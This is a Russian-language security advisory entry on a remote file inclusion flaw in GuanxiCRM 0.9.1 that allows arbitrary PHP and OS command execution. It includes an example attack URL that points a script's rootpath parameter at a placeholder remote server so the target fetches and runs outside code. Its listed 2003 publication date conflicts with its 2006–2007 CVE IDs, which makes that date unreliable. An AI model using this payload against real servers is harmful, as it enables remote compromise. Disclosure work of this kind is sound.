Выполнение произвольных команд в GuanxiCRM
| Дата публикации: | 25.07.2003 |
| Дата изменения: | 09.11.2012 |
| Всего просмотров: | 1212 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2006-4898 CVE-2007-5096 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | guanxiCRM 0.x |
| Описание: | Уязвимость обнаружена в GuanxiCRM. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы на целевой системе.
Несколько сценариев (parser.php, dom.php, imap.php, rfc822.php, fetchmail.php, maillist.php, operations.php, class.html.mime.mail.class, и settings.php) не в состоянии правильно проверить переменные, определенные пользователем. Удаленный пользователь может определить удаленное местоположение для нескольких PHP файлов, которые будут выполнены на целевом сервере. Пример: http://[target]/[guanxicrm dir]/include/phpxd/include/dom.php?appconf[rootpath]=http://[remote server] Уязвимость обнаружена в GuanxiCRM 0.9.1 |
| Ссылки: | GuanxiCRM Remote Include Vulnderability |